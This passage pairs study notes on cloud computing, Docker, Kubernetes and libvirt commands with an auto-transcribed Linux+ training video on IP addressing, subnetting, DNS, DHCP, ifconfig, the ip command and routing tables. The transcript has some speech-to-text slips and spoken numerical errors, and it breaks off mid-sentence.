    • Software as a Service (SaaS): Delivers applications over the Internet on a subscription basis. Users access these applications via a web browser without needing to install or maintain anything. Examples include Microsoft Office 365, Google Workspace, and Salesforce.

    Advantages of Cloud Computing:

    • Scalability: Easily scale resources up or down based on demand.
    • Cost Efficiency: Reduces upfront costs by eliminating the need for physical hardware.
    • Flexibility and Accessibility: Access services from anywhere with an internet connection.
    • Reliability and Availability: Redundant locations ensure high availability and reliability.
    • Disaster Recovery: Scheduled backups prevent data loss.
    • Automatic Updates: Services are automatically updated without user intervention.

    Major Cloud Providers:

    • Amazon Web Services (AWS): Offers a wide range of services, including computing power, storage, and networking.
    • Microsoft Azure: Provides seamless integration with Microsoft products and a variety of cloud services.
    • Google Cloud: Known for capabilities in data analytics and machine learning, with a robust set of cloud services.

    Containerization Containerization involves packaging applications and their dependencies into portable containers that run consistently across different environments. Docker is a popular containerization tool.

    Containers vs. Virtual Machines:

    • Containers share the host operating system’s kernel, making them lightweight and fast to start.
    • They include everything needed to run the application (code, runtime, etc.) but do not include an OS.
    • Virtual machines, in contrast, run on a hypervisor and include a full operating system.
    • Docker containers run on anything supporting Docker, ensuring consistency across development, testing, and production environments.

    Benefits of Containers:

    • Efficiency: Lightweight and use fewer resources.
    • Scalability: Easily scale up or down based on demand.
    • Portability: Can be transferred and run on various operating systems.
    • Isolation: Multiple applications can run on the same host without interfering with each other.

    Basic Docker Commands:

    • docker run -it <image_name>: Runs a container image interactively.
    • docker ps: Lists running containers.
    • docker stop <container_id>: Stops a running container.
    • docker pull <image_name>: Downloads a Docker image from Docker Hub.

    Container Orchestration Container orchestration tools automate the deployment, scaling, and management of containerized applications.

    • Kubernetes (K8s): An open-source platform for automating deployment, scaling, and management of containerized applications. Key features include automated deployment and scaling, load balancing, self-healing, and secure management of sensitive information.
    • Example commands: kubectl create deployment nginx –image=nginx to create a deployment and kubectl scale deployment nginx –replicas=3 to scale the deployment.
    • Docker Swarm: Docker’s native clustering and orchestration tool, simpler than Kubernetes. It offers simplified setup, scaling, load balancing, and secure communication between nodes.
    • Example commands: docker swarm init to initialize swarm, docker service create –name web –replicas=3 -p 80:80 nginx to create a service, and docker service ls to list services.

    Virtual Machine Management (libvirt)

    • Libvirt is a toolkit with an API for interacting with VMs across different virtualization platforms like KVM, Xen, and VMware.
    • It provides a unified API for managing VMs across different hypervisors, simplifying VM management.
    • Key features include virsh for management and virt-install for creating new VMs.

    Common libvirt Commands:

    • virt-install: Installs a new virtual machine.
    • Example: virt-install –name myubuntuvm –memory 2048 –vcpus 2 –disk path=/var/lib/libvirt/images/myubuntuvm.qcow2,size=20 –os-variant ubuntu20.04.
    • virsh destroy: Forcibly stops a specified VM.
    • Example: virsh destroy myubuntuvm.
    • virsh list –all: Lists all VMs managed by libvirt.
    Full Linux+ (XK0-005 – 2024) Course Pt.2 | Linux+ Training

    The Original Text

    this training series is sponsored by hackaholic Anonymous to get the supporting materials for this series like the 900 page slideshow the 200 Page notes document and all of the pre-made shell scripts consider joining the agent tier of hackolo anonymous you’ll also get monthly python automations exclusive content and direct access to me via Discord join hack alic Anonymous today okay now it is time to talk about networking and the fundamentals of networking again this is not going to be a replacement for Network Plus or anything like that but it will be fairly comprehensive and we’re going to go through a lot of the fundamentals as well as some of the commands and tools that you will need to uh navigate the network and the network connections and the interfaces of a Linux environment so first and foremost let’s go into some basic networking Concepts IP addressing so IP addresses are unique identifiers assigned to devices that are connected to a network they allow you communicate with each other uh and are very important for Network management and communication uh so anything when you hear something like a network or anytime that you hear the word network uh think IP addresses and uh IP addresses are very much the main uh the I mean address the main identifiers that uh are assigned through various devices so your TV has an IP address your phone will have an IP address address your computer obviously will have an IP address um anything that’s connected to a network anything that’s connected to the internet will have an IP address ipv4 is the original IP address and it’s a 32bit numerical label uh what you see right here in the green right here that’s traditionally what it looks like it’s separated by three dots and it has three digits or it can have up to three digits on each portion of this thing and it can go from uh one actually Zer it can go from zero and uh go all the way to 254 I want to say um we’ll verify that in a couple of slides uh so what it does is it provides approximately 4.3 billion unique addresses but then what happened is that a lot of devices were developed so you know the average household has or the average person even has multiple uh devices that are connected to the internet and quickly uh way faster than I think people anticipated uh the ipv four addresses ran out um but what happens is that each a uh ISP each internet service provider assigns a series of private IP addresses to each individual person and uh for the most part you will not run across a a duplicate IP address although being that there’s only 4.3 billion unique variations uh it can run across so it can actually have duplicates and that’s one of the issues that resulted in them developing IPv6 so uh ipv4 is the most commonly used version of Ip but because of the fact that there were so many devices they developed a new uh IPv6 format and the IPv6 format looks very different from what we saw previously it is 128bit whereas ipv4 is 32bit so when you have a 128bit identifier it obviously looks a little bit different so in this particular case this is a s Le of an IPv6 address and instead of offering the billions this actually offers 340 unilan addresses and I don’t I I had not even heard of this word prior to looking at IPv6 IP addresses um clearly it is way more than what is available with ipv4 so it’s designed to replace ipv4 eventually but your current computer my current computer uh they have both of these so they’ll actually have the ipv4 as well as the IPv6 But ultimately at some point not exactly sure when IPv6 will replace ipv4 IP addresses to understand networking and IP addresses you also need to understand subnetting so what a subnet is and subnetting is a method that’s used to divide a larger Network into smaller chunks so that they’re easier to manage um and those small chunks are called subnet and it improves the network organization uh the efficiency of the network and the security of the network it also helps to reduce the congestion of the network meaning that there won’t be uh too many things happening at the same time it won’t be blocked off or clogged so to speak um a subnet mask is what you can see as an example in this particular case in the green right here so subnet mask determine the network and the host portions of the IP address so for ipv4 a common one is what you see here now the network portion are these first series of 255s and then the host portion would be this very last thing that is represented by a zero here so in this particular case we have three octets that represent the network portion so that’s one octet that’s another octet that’s another octet Al together you have four octets and four time octet so octet repres repr is8 bits right so when you have 4 * 8 you have a total of 32 so this is a total of 32 bits now when you have the first three octets that are represented by the network that means that these are the network itself so in uh in this particular Network these three portions are going to look exactly the same and each device is going to have a different number at the very end of it so the first three portions will be exactly the same because that’ll be that Network work that they’re connected to and then that last bit is what’s going to change that last octet is what’s going to change to assign an unique identifier for each one of those devices so for example in this particular case we have you know 1 192 16811 was a subnet subnet mask of 255 2555 2555 so the first three o octets are exactly the same which means that this portion 1921 1681 this first three the numbers right here represent the network and then the last piece would be the actual host and then if there’s three hosts that presumably it would be one 2 and three so 1 1921 16811 1 1921 16812 1 1921 16813 so on and so forth so this is the uh subnet that is represented with this mask right here we have this subnet mask now if we wanted to expand this this is what it actually looks like right here so the binary representation is we have eight ones here8 ones here 8 ones here and then we have the zeros at the end representing the portion that can change and this is the subnet mask right here uh the network bits in this case are 24 so you have 8 * 3 which would be 24 the host bits would be eight this last eight uh octet or this eight bits right here the calculation it’s a little bit complicated but not really so you have the number of the hosts per subnet which would be two to the power of the number of host bits so the number of host bits in this case would be eight so 2 to the power of 8 is what we see here minus 2 and I’ll explain what this means right here but 2 to the^ of 8 minus 2 would be 256 so 2 to ^ of 8 would be 256 minus 2 which ends up being 254 so this particular subnet can have 254 individual IP addresses okay so 254 hosts can reside on this particular subnet mask that’s how it breaks down now we look at the next sample of this where you have a subnet mask that actually has the first two octets reserved for the network and then you have the next two octets reserved for the host so you have 16 bits this portion 2 * 8 is 16 bits you have these 16 bits reserved for the network and then you have these 16 bits reserved for the host and when we actually do the calculation here it would be 2 to the^ of 16 which is 65,536 65,536 potential host except you have to subtract that two so it ends up being 65534 so very different from this 254 that is on this one octet right here if you just free up two of these octets for this particular particular subnet mask you now have 65,535 potential host IP addresses that you can assign to people inside of this particular subnet or this particular Network right so this is what it looks like now why do we subtract two this is a very important question so there are two addresses that we need to reserve for any given Network and the first one is the network address so the first address in the subnet which is reserved for the network itself which ends up being represented by just it could be the zero right for example and then the next one is the broadcast address which is the last address that’s represented in the network which would be technically the 256 for example or 255 excuse me so the zero and then the 255 for example would be the ones that are reserved so you actually can go up to 254 right so it go from 1 to 254 for as an example but for the most part and you can assign this when you’re actually assigning your gateways and you’re uh developing your network subnet and The Mask itself you will assign your network address and then you will assign your broadcast address and then that will take up two of those variations and then the remaining uh 253 of the variations will allow for the rest of the devices the rest of the hosts that can reside on that subnet so as a summary we can have have this subnet that allows for 254 potential hosts to reside on it and then you can have this subnet that can allow for 65,535 potential hosts so uh this would obviously be a company this would be probably a home or a company that has less than 254 devices and being that each employee might get let’s say I don’t know their cell phone would be one their work cell phone would be another one their computer would be one maybe an IP address or iPad or something like that a tablet that would be one their TVs that would be uh if they have any Smart TVs sprinkled around the office so on and so forth so for the most part you’re going to have maybe around 50 employees that can reside in a network that like that looks like this but anything more than that they would have a larger subnet because there’s just multiple devices per employee per person and so you just need more than 254 potential addresses and this is how subnet masks and the calculations of those hosts work when a device connects to a network it is assigned an IP address this address can either be ipv4 IPv6 depending on the Network’s configuration subnetting helps organize the network by breaking it into smaller segments making it easier to manage and enhance security by isolating different parts of the network from each other so this is the whole purpose behind it number one to make it easier to manage and enhance the security by isolating different parts of the network from each other so uh when you have multiple subnets it makes it easier for you to find out which host was uh for example uh exploited and which host was hacked into and because they reside in their own little segment they won’t affect the rest of your network and it can be contained uh within that specific segment it can be isolated within that segment the domain name system is the next level up when it comes down to addressing so it’s basically the phone book of the internet typically domain names are related to actual websites but each website actually has an IP address as well so what happens is that most people aren’t going to remember the IP address for the website so you the IP address for Google for example is whatever the series of numbers are but you’re not going to remember that but you will remember Google so you can remember example.com in this case but example.com actually is pointing to an actual IP address right so even websites have IP addresses web servers web applications all of these things actually have IP addresses if they are connected to the internet but for the most part people aren’t going to remember the IP address most people aren’t that good with numbers but they are fairly good with names everybody can remember facebook.com they won’t remember the Facebook IP address but they’ll remember the version of that IP address which would be their domain name and so the do domain name will go through the DNS uh Port as well as the domain name system protocol right and so this is how IP addresses get translated into domain names now how DNS works is that when you type something into your browser the computer needs to find the IP address that’s connected to that actual name the domain name so because they’re most uh easier for us to remember and we enter that the computer how works with the individual IP addresses so it needs to resolve that domain name to some kind of an IP address so what it does is that it’ll send out a query right so it’ll looks like this right you will put your uh input as the user you’ll enter a domain name and that’ll be example.com and you’ll put that into the browser you press enter and then the resolver of the DNS in the computer sends a query right the computer will send send the query to the DNS resolver the resolver is typically provided by the ISP the internet service provider and then the if the resolver doesn’t actually have that in its cache so if you don’t have it stored in your cache or if the ISP doesn’t have it stored in its cache then it performs an actual lookup and it finds it for you and then it stores it right so it’ll query multiple DNS servers to find the correct IP address and then once it finds that IP address address it will resolve it and it’ll connect that IP address to the domain name so that the next time that you go and enter that name it’ll just load it for you quickly if you clear your cache then it’ll perform that process all over again the next time that it goes through the search for the DNS resolver right so you enter something the computer will send that query to the DNS resolver that’s typically with the internet service provider so AT&T for example it’ll send it to AT&T’s DNS resolver and the AT&T’s DNS resolver will go through its database of all of the IP addresses that are connected to domain names and if it has it in there it’ll just send it and uh it’ll send you to the website that you’re trying to go to if it doesn’t have it it does a recursive look up and it try to find what that IP address is connected to or what that domain name is connected to and then it’ll load that IP address onto your browser all of this happens in a matter of a second or two depending on how fast your internet services so all of these things happen very very quickly um and you don’t really see them in the foreground all you see is you typed in the IP address you pressed enter a second or two later a website loads but this is what’s happening in the background the DNS server hierarchy um is connected via the uh the resolver itself so the resolver will contact one of the root DNS servers and these are at the top of the DNS hierarchy so these are the actuals and the orgs and the Nets so these servers are at the top of the DNS hierarchy and they direct the query that DNS query that you made to the appropriate top level domain server which would be any of these guys so if it’s a website it’ll go to that domain server and then from that list of domain names it’ll find the IP address if it’s a.org it’ll go to that server and from that list will pull whatever it is right so there are individual uh servers typically because the fact that there are literally probably billions of domain names at this point as well so there’s a bunch of different dos. org.net now there’s doco and. us. coffee there’s a bunch of different top level domain names now so because of the fact that there is so many different variations each one of them are going to have their own server and then when you send that query that query is going to go to the appropriate server so that it can find the domain names and this is mainly to make the process a little bit faster if they were housing doc.org domnet and every other top level domain name if they were housing all of those things on one server at AT&T it would probably take a much longer amount of time for that domain name to be pulled up and for that IP address to be found so the TLD DNS server um once they’re contacted if you’re looking for example.com it would find the cont I already explained all this so I’m just going to I’m just going to Breeze through this particular portion I got a little bit ahead of myself but again so so if you’re looking for the com it’ll go to the contact of theom TLD server and it it’ll direct the query to that specific authoritative dnf server to get you example.com the authoritative DNS server which is the final step of this whole thing is the one for this particular example for example.com these servers um host the actual domain name itself and then they have the actual DNS records that map that to the IP address and then that’s where the data gets pulled so it goes from the the top level server the TLD server it’ll find that and then from there It’ll point to the authoritative DNS server that’s actually hosting that domain name and that could be at AWS it could be at GoDaddy or a variety of different hosting providers um once it is found and once the data has been pulled it returns that to you right it sends it back to your computer and then it just uh populates it onto your browser so that you can actually look at whatever you want want to look at and watch the video or watch Netflix or all these things so all of this stuff is happening so that you can get access to the data that you want to get access to so to give you a visual representation of everything that we just talked about typically these things are a little bit easier when you look at kind of the flow of it like this right so on your computer you would look for self-repair apple.com so selfrepairing which would be uh either the cache that you have on your computer the cache and host file that you can see on the left right here or it’ll be with your ISP right so if that doesn’t exist uh if you don’t have it if you haven’t checked it then what’s going to happen is that this local DNS server is going to send that question out it’s going to send that query out and it’s going to say where is this place where is this location what’s the IP address of this place and it’ll go to the root server and in the root server says I have no idea try the authoritative server for the people right for all the dot domain names and the authoritative server is going to be at this particular location so that gets sent back to the local DNS server local DNS is like all right fine you don’t know so I’ll go to this guy and this would be the Doom top level domain authoritative DNS server so it’ll go to those guys and it’ll say hey where is this thing and they’re like I have no idea why don’t you try apple right why don’t you try the actual Apple server so that you can find out what the the self-repair apple.com location for that IP address is so that would be the TLD authoritative servers response and then that comes back and then the local DNS is like okay fine let’s go to Apple so you and every single time you see that this one this one says I don’t know why don’t you look for the dot server that’s hosted at this IP address and then this is like oh okay so let me go to that IP address and they go and then this is the top level domain authoritative server and then this thing sends a respon back I have no idea why don’t you go to this IP address which belongs to Apple and he’s like oh okay fine and it’ll come back and it’ll be like hey Apple where is this particular thing and then Apple says I don’t know why don’t you try the authoritative server for repair. apple.com so now there’s the extra piece that comes in for this and then it says that is housed over here and then finally it sends it over here and it says okay fine hey where is this thing and then this says oh no problem there is no self-re there is no self-d out repair that awful and it’ll send it back and then the website says okay there is nothing and this is where like you probably will get an error or something on the screen that doesn’t load it now if there is something like that then what will happen is that it’ll say oh this is the IP address for it and then it’ll send it to the DNS server and the DNS server will send it to your computer and it’ll load it for you right that’s the process right here this I just think that this is so funny that it send this like it send this on this wild goose chase and you go back and forth and then you’re like oh there is nothing here and it’s like oh Jesus um and so uh presumably right so if this uh particular location was not self. repair. apple.com if it was I don’t know repair. apple.com is it would stop at this portion right it would stop at this place and it would be like yeah okay here’s the IP address for repair. apple.com if we were just trying to go to apple.com and you send it Hey where’s apple.com and it’ll say I don’t know why don’t you try a doom server and you’ll come to theom TLD authoritative server and you say Hey where’s apple.com it’ll be like here’s the IP address for apple.com right so it depends on how deep we’re trying to go with this inquiry that we’re making and where we’re trying to land obviously but it goes from your local DNS server it’ll go to the root server the root server will send you to theom tldd server that place will send you to the potential authoritative server for that actual domain name for that actual website right and this is the process of literally everything that we just talked about with this whole DNS part so just to give you that explanation we have the DNS servers which are the specialized servers that are responsible for handling the process of translating a name to an IP address and there are different types of server so you have the DNS resolver that we just talked about which is the recursive resolver and it receives the original query from your computer so that was that thing in the bottom left corner it receives that thing from your computer and it handles the process of contacting everybody else to find that for you and then finally it’ll send you if it finds it it’ll send you to the page that you were looking for from that the DNS resolver from that location it’ll go to the root DNS server which was the thing in the top right and then it’ll say this is the first stop and this is what we’re looking for why don’t you go to the appropriate TLD server which might be.com or might be.org or whatever and then that will go to the actual or.org or.net whatever that top level domain server and then from there it’ll redirect you if it has the address it’ll redirect you if it doesn’t it’ll send you to the authoritative DNS server that will find help you find the other thing but typically this is where it stops so it’ll go from the TLD DNS server and then it’ll say okay go this is the Doom location for the authoritative DNS that you’re looking for and then you can go to this particular place place and these are the servers the authoritative DNS servers are the ones that actually store the records for domain names and provide the final IP address in response to what you’re looking for in that particular case we were trying to go to store.apple.com and then we were trying to go to repair. store so that went a little bit further but typically this is where it stops you’ll go from T the TLD server which is like it’s a.org website oh okay I want to go to.org website it’ll send you to that particular authoritative server and then that.org server will say oh okay this is the address for this particular website that you’re looking for it makes it a lot easier so instead of you having to remember IP addresses you just remember a name that’s it that’s kind of one of the biggest benefits of uh DNS right once you get past the user friendliness it becomes scalable so if you wanted to look at all of the freaking devices that are on the internet and the domain names that are on the internet and the IP address that are connected to these domain names on the internet and you want to expand that then you’re looking at scalability so DNS supports all of the massive number and it’s constantly growing so it supports the growing number of devices that people keep buying and they’ll add another TV to their house and all of the domain names that people keep buying so it supports that scalability right that the massive number that keeps growing and gets bigger and then when you’re considering the amount of of queries that are being made to the Internet so imagine how many billions of queries are being made right now as you’re watching this how many millions and billions of people are trying to access millions and billions of locations across the internet when you consider the massive amount of traffic that’s just going back and forth as you’re watching this right now across the internet you need to also consider well these things can’t crash right there needs to be some kind of a a redundancy means there’s a backup server for Microsoft for example so if there initial server there’s some kind of earthquake at the first server’s location and that particular building has a power outage there needs to be a backup server that kicks in immediately so that microsoft.com doesn’t crash and you can still go and access that website that was actually something that happened relatively recently where the Microsoft service um and all of the computers and all the devices that r Li on Microsoft couldn’t work and this was like a couple of months ago it was pretty recent that that actually happened and in that day Microsoft lost over I think $150 million something like this some crazy number that they lost during that one day that they had an outage so this is where redundancies come in this is where reliability comes in the DNS system and the variety of different uh TLD servers so it’s not just one TLD server that has es all of the domains it’s literally dozens of them probably in the hundreds that are across the globe in different locations so just in case one crashes you can go to the another one and you still get reliable connections if you wanted to and just expand that extrapolate that to the orgs and the Nets and all of the different countries and the different cities and so on and so forth this is where redund redundancy is a big deal this is where this structure this hierarchy of structure that’s available is a big deal and it provides that reliability that people actually really need because I mean what would you do without the internet and once you get past DNS once you understand DNS then you go into DHCP which is the dynamic host configuration protocol and this is a network management protocol that’s used to automate the process of configuring devices on IP network so this is essentially what assigns the IP addresses to any new device that’s connected to your router to your internet right so when somebody comes and connects to your Wi-Fi this is the protocol that assigns the IP address and any other configuration parameter to that device that just connected to your Wi-Fi so it’s DHCP that assigns the IP address to your Wi-Fi to your to the device that just connected to your Wi-Fi uh the way that it works is that a device like a computer whatever connects to your Wi-Fi it connects to the network when it does that it doesn’t have an IP address so it sends out a discovery broadcast message to a d DHCP server the DHCP server makes the offer and it so it receives that Discovery message and then it responds with the offer message and it says hey here’s the available IP address that we have on our Network and the network configuration information that you need like the subnet mask that’s connected to uh the default gateway that would exist and any DNS server addresses so on so and most people really don’t give a crap about this they just want Wi-Fi so most people really don’t care about this and of course the devices don’t display all of this stuff to the person who’s connecting their cell phone to the Wi-Fi that you say oh I have Wi-Fi connection but what happens is that your cell phone sends out the request and then the DHCP server actually responds with an offer and says this is the IP address that I got for you and these are all of the rules and uh configuration details for our specific Network and then the device receives that offer and responds with an actual request message that says hey I accept the offer that you’ve made thank you for this IP address and thank you for giving me connection to this network and finally the server will acknowledge that request and it’ll say all right cool this is your actual IP address from now on and every time that you connect to me this is the IP address that’s going to be assigned to your particular device and now the device can actually use the internet because it has its official address and it can communicate with the network the vast wide network of the internet the worldwide web there are a lot of benefits to this obviously right so it simplifies the network setup imagine if you had to be the one to assign an IP address to every single device that connected to your network and believe it or not at a certain point in the history of the internet this was actually the case and people had to manually assign IP addresses to the computers and to the devices that were connected to the network so uh especially when you have a massive Network where configuring each device would not be possible which is what Microsoft has or what Amazon has they have literally tens of thousands of employees so imagine if somebody had to sit there assigning IP addresses that would be like a full-time 247 type of a job so um it avoids the conflict of addresses this is the other piece that is uh very much prone to human error right so somebody might forget that oh shoot I already assigned this address to this other device and now I can’t reuse this address and now I got to go do this other thing and try to find a new address own and so forth the DHCP protocol the the uh system itself just keeps track of all these things and avoids any conflict so it assigns an actual unique address to the person or to the device that’s being connected to the network and then there’s the management of the IP address so um people want to use their IP addresses uh efficiently if there’s any kind of a security issue or a disconnection from the network the IP address can be resigned to another uh reassigned excuse me to another device um if it has to do anything with uh firewalls which we’re going to get into a little bit as well it helps with the management of IP addresses and blocking or meaning denying access to the network via the IP address or allowing access to the network so on and so forth so it’s the management of these IP addresses that comes in um and again it has to do a lot with uh networks that have a lot of temporary or what they call transient devices so if you go to a uh a coffee shop Wi-Fi hotspot right so if you go to a coffee shop and you’re connecting to that Wi-Fi that specific Wi-Fi at that coffee shop has probably seen tens of thousands of devices that just roll through and they’re there for just one day because they need Wi-Fi and then they leave you know the person came into town for a trip and then they left and they’re never going to visit that uh Wi-Fi spot again but that IP address that was temporarily assigned to that person now needs to be freed up so that it can be assigned to somebody else right so this is how these transient devices or these temporary devices get managed through the DHCP protocol and this is very important to understand especially when you just go into a large Enterprise environment these are the types of things that are very very useful so when you’re thinking about the management of IP addresses what assigns the IP address inside of the network that would be the DHCP protocol what assigns the the name to an IP address that would be the DNS protocol right what types of IP addresses are there ipv4 and IPv6 right so these are the key things that you need to remember when it comes down to the networking fundamentals when you go further along with this the DHCP lease is basically the time the the temporary amount of time that that IP address will be assigned to that given device right so in a public Wi-Fi environment to the DHCP lease time is obviously way less than your personal home internet so when the lease time is about to expire the device has to renew the lease by sending a new request to the DHCP server and then the DHCP server will send the offer um if it stays connected to the network the server typically just renews the lease which extends the time that the address is assigned so that you don’t have to get a new IP address every single time for your laptop to be connected to your home Wi-Fi right so if it’s constantly connected to it or it’s connected uh perpetually like you never take your desktop computer out of your house it stays right the laptop might be put in your backpack and it’ll leave and it’ll come back but the desktop will never get disconnected from that Wi-Fi so in that particular ular case it’ll just renew the lease and it’ll just keep granting access to that particular IP address but when your friend comes over and that you don’t see them for the next 3 months or 6 months or whatever that lease time will lapse and then they’ll need to reapply they’ll need to submit a new request to the DHCP protocol the DHCP server so that they can get assigned a new IP address when they come back to your house so as a summary DHCP streamlines Network management it assigns IP addresses to devices making sure that the IP addresses and any conflicts and everything are all handled without you even having to worry about it um it also simplifies the process of connecting devices to a network by making sure that the network efficiency is overall uh just running smoothly it it’s enhanced and again you just don’t have to worry about it all of these things happen behind the scenes you don’t even think about these things for the most part if you don’t know anything about networking you probably have never even heard of this and you are like oh wow I didn’t know all this was happening but yeah there’s something that assigns the IP address to somebody that gives them access to your Wi-Fi and that is called DHCP all right now we need to address what a network interface actually is so the interface configuration uh Legacy meaning the old school version and actually this is what’s running on my current Macbook so this is not uh Legacy in the regard that it’s no longer being used there’s still a lot of conf uh computers that use if config um but this is the interface configuration that happens with this particular tool or command so I have config uh short for the interface configuration is a command line utility that is used to configure your network interfaces on Unix based operating system so for example Linux or Mac OS um it connects it it creates those interfaces it configures the network interfaces to the actual IP address so it’s been deprecated supposedly um but it’s uh still very much in use so but when I try to run this just to test on my MacBook uh and I ran IP uh it didn’t work it said IP doesn’t exist when I ran if config if config worked so uh it’s not as deprecated as they make it sound and it’s still very much in use um when you go to Windows if config is IP config and it serves the same exact purpose the simplest version of the command is to just type if config and press enter and it’ll lists all the network interfaces that are on your system along with all of the current configurations meaning the IP addresses that are assigned to them if there are any network masks or broadcast addresses and everything else that would be appropriate for that particular configuration this is an example output right here so eth0 is the actual interface in question these are all the flags that are attached to it so it’s up and running it has the broadcast so on and so forth multicast um the inet IP address for this is this piece right here the network mask for it is this so this is the subnet mask that we were talking about and this is the broadcast IP address that’s assigned to this particular Network right so this is the this is just a sample of the output of what would happen when you ran if config now if you wanted to configure the IP address then you would do pseudo if config and then that specific interface that we were just talking about and then the IP address that you would want for it and the net mask that you would want and then you would do up to just make sure that the IP address has been assigned to it and the subnet mask is what it is and then the up keyword brings the interface up meaning it actually activates it right so if you wanted to take it down you would just type down but this is a configuration command so you say uh this specific IP address is what I want to assign to this particular interface and I want it to be on this type of a subnet mask and I want it to be up I want it to start running right so this is what uh how you actually configure something like that you don’t have to necessarily do it because typically the DHCP protocol will do it for you but in case you actually need to do it manually then this is what it would look like to configure an IP address manually for any given interface which is in this case the eth0 and this is the detailed breakdown of everything that I just said so uh maybe I I just should like click forward and see if I actually have these notes in the future slides um so pseudo would be running the command as a super user which is the administrator privilege the eth0 is the inter uh the network interface that you want to configure so it could be anything that has to do with your interface it could be eth1 it could be TP typically not Lo which is the local uh host you typically would not modify that that ends up having the same exact IP address on every single machine which is 127.0.0.1 .1 um so eth0 would be the particular interface in this case that we’re going to be configuring this is the IP address that we’re going to assign to this interface this is the network mask the subnet mask that we are going to assign to this interface and then we want to activate the interface and make sure that it’s up and just like you can bring an interface up you can shut it down or you can deactivate it essentially and so without having to configure the IP address or anything like that if you just wanted to make sure that this particular interface is active you would do ETA Z up if you want to take it down or deactivate it you would just do ea0 down they control the state of the interface itself when you bring it up you activate it when you take it down you deactivate it um bringing interface up or down the usage itself as an act uh as an example over here would just be exactly what we repeated in this particular case and so these are just some examples so if config e0 up or down in this particular case so in conclusion and summary we you know that if confi is supposedly deprecated but it is not because it is active and running on my computer right now on my MacBook right now um it remains a widely recognized tool for managing network interfaces on Unix based systems and allows you to view the interface configurations assign IP addresses control the state of interfaces and that is what I if config does IP is supposed to be the modern replacement for if config it’s part of the IP Route 2 package and it basically does everything that we just talked about with if config except the command in this particular case would be IP you would just do IP space a and press enter or you would just do IP space address so addr and then press enter and it’ll just display all the network interfaces very similar to what if config would do including the IP addresses Mac addresses and any other detail that is relevant to them and this is what the example output looks like so this is very similar to what we talked about previously um The Local Host right here is what this is at the very very top right here and the IP address as I mentioned for the local host on every single device that I have scanned and uh pen testing or anything like that this is the Local Host IP address so this one is universal across every single machine that I’ve ever messed with okay then there’s the eth0 which is the actual interface that is being assigned an IP address on your Wi-Fi on your local network and in this particular case this is the IP address for it right so this is your act actual IP address for or in this particular example this is the actual IP address for this particular machine right and so this would be the broadcast address and then where is their inet mask we see the mask or no I think the mask is not available on this particular example but you see the MAC address as well you see the so this is the MAC address that is connected physically to the ethernet and the MAC address can be spoofed that’s a whole other conversation but uh Mac addresses are not permanent neither are IP addresses you can also spoof an IP address I don’t know why I even said that anytime I think Mac address I’m like oh Mac address spoofing um but this is typically what it looks like so it’s very very similar to the if config output um and in this particular case what we’re seeing over here is the MAC address as well and honestly in a lot of cases when I run if config I also see the MAC address for my devices on if configs output so this is not just limited to the IP Command itself um you have the the assigning of IP address is very similar to what we did with if config uh which would be pseudo IP addr and then you’re going to add this particular IP address with the back uh the forward slash of 24 to the e0 interface and then there’s going to be the breakdown of this so I’m not going to try to explain all of it on this particular screen but what we’re doing is that we’re assigning this particular IP address with a subnet mask which is 24 bits so meaning the first three right here the first first three octets are assigned to the network and then the last octet is assigned to the host itself and then so you’re assigning that particular subnet mask to this particular piece actually so we can actually see this right here so instead of showing the 2555 255 2550 this is the piece right here that tells us what the subnet mask is so in this particular case it’s saying that the the network is assigned 24 uh bits which would be three octets which is what this represents right here okay so breaking it down you have the pseudo command that runs it as an administrator you have IP address add which indicates adding an IP address this is the IP address that we’re adding and we’re putting it with a subnet mask of three octets which would be 24 bits and then we’re going to add it to the interface which is this particular interface the eth0 interface which is typically for the most part also what I’ve seen is that that is the interface name that is assigned to the very first IP address that you get assigned on your particular computer and the overall concept of bringing an interface up or down basically activating or deactivating an interface is also it also applies here it’s just the command is a little bit different so it would be IP Link set eth up or IP Link set eth0 down and this is how the whole thing breaks down so up obviously activates down deactivates it but you’re talking to the interface a little bit differently and you’re saying link I want you to set this particular interface up or down I want you to activate it or deactivate it and these are the examples of what it would look like if you wanted to bring something up or deactivate it and put it down so displaying the routing information um is mostly done so that you know what the paths that the network traffic is taking to reach various destinations uh it includes the information about the default routes that it will take the specific routes that it will take and the interfaces that have been used uh this is to try to troubleshoot any kind of connectivity issues and see if there is any individual connections that are being made along that particular path that the the traffic takes to actually reach its particular destination if any of those things are glitches this is also uh information that can be used for security analysis and Pen testing as well but it’s mostly used for network connection troubleshooting so it displays the routing table which shows the paths that the Network traffic will take and so this is what it looks like this is the sample output for this piece so you’ll have this whole thing right here and I’ll actually break this down in a little bit further detail for you so you kind of understand what this going on it’s not I don’t think this is actually inside of the the scope of the Linux plus uh studies and the examination but just to give you a good idea of what you’re looking at when you’re looking at the routing information so that your networking knowledge is a Little Bit Stronger so let’s actually look at what this piece right here means and what all of these different elements represent okay so now breaking it down in particular segments here so the first portion was the default via 19216811 Dev eth0 so the default indicates the default gateway which is used when no specific route for Destination is found in the actual routing table the Via 192 yada yada yada uh specifies the next hop address so it’ll go from the default gateway to the next address which is going to be the IP address of the default gateaway router that the traffic will be sent through so it’s going from this it’s technically just doing this it’s going to go from the Gateway but it’s going to go as this IP address instead of the default gateway and then this is going to indicate the network interface that’s going to go uh through the traffic that’s going to be routed through right so the default via so this is going to say this Gateway via this IP address on this particular interface is going to start traveling right so it tells the system to send any traffic that doesn’t match a specific route in the routing table to the default gateway at this particular IP address using this particular interface now the next line is this piece right here and we’re going to just break this down so we have this portion that represents a specific route for the IP address range which goes from 1.0 to 1.25 five where the 24 is the subnet mask which would be this piece right here so you should already know this now Dev eth0 is the associated with the network interface eth0 itself protoc kernel signifies that the route was added by the kernel and we already we should know what the kernel is right so the kernel usually as a result of configuring the network interface so it’s going it was added by the kernel this particular route that we’re looking at was added by the kernel and scope link indicates that the route is valid valid only for directly connected hosts on the same link which is the local network so this particular piece what we’re seeing in this line right here is only available for people who are actually connected to the same Wi-Fi the same internet that this particular device is connected to and then this is the source IP address so this is the IP address to be used when sending packets to this particular subnet so if we looked at it from the very very top right here you have the Gateway saying that this is going to be my IP address for communicating and then it’s going to say the rest of it for this particular device that’s connecting so it’s saying that this represents a specific route for this so it’s going to go from any of these to any of these and then it’s going to say that this is my interface this is my actual device that’s going to connect to it this was done by the kernel and it’s going to be on the same exact internet that we’re connected on so the local network or Wi-Fi this is what we’re going to be loc located on and then this is the IP address of the actual device right so it’s not to be confused with this IP address cuz this IP address was for the default gateway this is the IP address that is for this particular device that is communicating with the internet so when we combine both of these lines traffic for any unspecified destination so the default route will be sent through the Gateway at that address via that interface and traffic that’s specifically destined for this particular subnet will be routed through this particular interface using the IP address that was assigned to this interface again this might be a little bit confusing it might be a little 